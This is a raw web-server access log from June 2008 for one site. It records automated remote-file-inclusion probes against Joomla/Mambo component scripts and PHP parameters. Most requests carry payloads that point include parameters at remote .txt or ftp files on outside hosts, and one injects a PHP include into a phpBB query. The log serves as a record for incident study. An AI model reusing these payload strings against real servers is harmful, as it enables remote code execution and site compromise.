87.106.53.194 - - [17/Jun/2008:10:36:05 -0700] "GET /index.php?redir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18353 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.21 - - [17/Jun/2008:10:36:22 -0700] "GET /logs/access_080530.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:37:52 -0700] "GET /logs/access_080421.log//components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:10:37:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/old? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.102.101.139 - - [17/Jun/2008:10:37:56 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:10:37:56 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/old? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:10:37:57 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/1? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:10:38:10 -0700] "GET /logs/access_080213.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:10:38:11 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:10:38:11 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:10:39:03 -0700] "GET /logs/access_080131.log/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:10:39:03 -0700] "GET /logs/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:10:39:06 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:10:39:07 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:10:39:07 -0700] "GET /logs/index.php?redir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:10:39:09 -0700] "GET /index.php?redir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.811" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:10:39:30 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:10:39:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:10:39:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:40:26 -0700] "GET /logs/access_080329.log/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:40:31 -0700] "GET /logs/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:10:40:37 -0700] "GET /logs/access_080312.log//errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:10:40:37 -0700] "GET //errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:10:40:37 -0700] "GET /logs//errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:40:38 -0700] "GET /logs/access_080329.log/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:40:38 -0700] "GET /index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:40:39 -0700] "GET /logs/index2.php?content=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:10:40:47 -0700] "GET /logs/access_080312.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:10:41:10 -0700] "GET /logs/access_071208.log HTTP/1.0" 200 94709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:41:28 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:41:28 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:10:42:17 -0700] "GET /logs/access_080218.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:10:42:55 -0700] "GET /logs/access.log//errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.69 - - [17/Jun/2008:10:43:01 -0700] "GET /logs/index.php?option=com_poll&task=view&Itemid=&mosConfig_absolute_path=http://www.smdserv001.co.uk/cwfm/b.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
59.106.19.69 - - [17/Jun/2008:10:43:03 -0700] "GET /index.php?option=com_poll&task=view&Itemid=&mosConfig_absolute_path=http://www.smdserv001.co.uk/cwfm/b.txt? HTTP/1.1" 200 18525 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:45:14 -0700] "GET /logs/access_080216.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:45:14 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:45:14 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:45:15 -0700] "GET /logs/access_080216.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:45:16 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:45:16 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.58.160 - - [17/Jun/2008:10:45:22 -0700] "GET /logs/access_071216.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:45:31 -0700] "GET /logs/access_080312.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:45:31 -0700] "GET /logs/access_080312.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:45:33 -0700] "GET /logs/access_080312.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:45:49 -0700] "GET /logs/access_080312.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:10:45:58 -0700] "GET /logs/access_080429.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.172.251.66 - - [17/Jun/2008:10:46:39 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:10:47:03 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:10:47:04 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.63.85.187 - - [17/Jun/2008:10:47:04 -0700] "GET /logs/access_080124.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [17/Jun/2008:10:47:04 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [17/Jun/2008:10:47:04 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:10:47:04 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:30 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:30 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:30 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:32 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:32 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:33 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:34 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:35 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:35 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:38 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:38 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:47:39 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:47:43 -0700] "GET /logs/access_080312.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [17/Jun/2008:10:47:54 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:47:58 -0700] "GET /logs/access_080312.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:10:48:36 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
61.155.9.236 - - [17/Jun/2008:10:48:38 -0700] "GET /logs/access_080117.log/index.php?body=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.155.9.236 - - [17/Jun/2008:10:48:44 -0700] "GET /index.php?body=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 200 18429 "-" "libwww-perl/5.805" "www.dmulk.com"
61.155.9.236 - - [17/Jun/2008:10:48:45 -0700] "GET /logs/index.php?body=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.91 - - [17/Jun/2008:10:49:02 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:10:49:24 -0700] "GET /logs/access_080429.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:49:26 -0700] "GET /logs/access_080313.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:49:26 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:49:27 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.213.218 - - [17/Jun/2008:10:49:42 -0700] "GET /logs/access_080429.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://and3rogues.com/atr/images/avatars/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:03 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:03 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:03 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:13 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:14 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:14 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:14 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:15 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:15 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:51:15 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.155.9.236 - - [17/Jun/2008:10:52:12 -0700] "GET /logs/access_080201.log/index.php?body=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:10:52:27 -0700] "GET /logs//errors.php?error=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:10:52:27 -0700] "GET //errors.php?error=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.20.46.121 - - [17/Jun/2008:10:52:43 -0700] "GET /logs/access_080312.log/admin.php?include_path=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [17/Jun/2008:10:52:43 -0700] "GET /admin.php?include_path=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [17/Jun/2008:10:52:43 -0700] "GET /logs/admin.php?include_path=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:10:53:28 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:10:53:28 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:10:53:29 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:10:53:55 -0700] "GET //errors.php?error=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:53:58 -0700] "GET /logs/access_080313.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:53:58 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:53:59 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:54:26 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:54:26 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:54:27 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:54:30 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:54:30 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:54:32 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
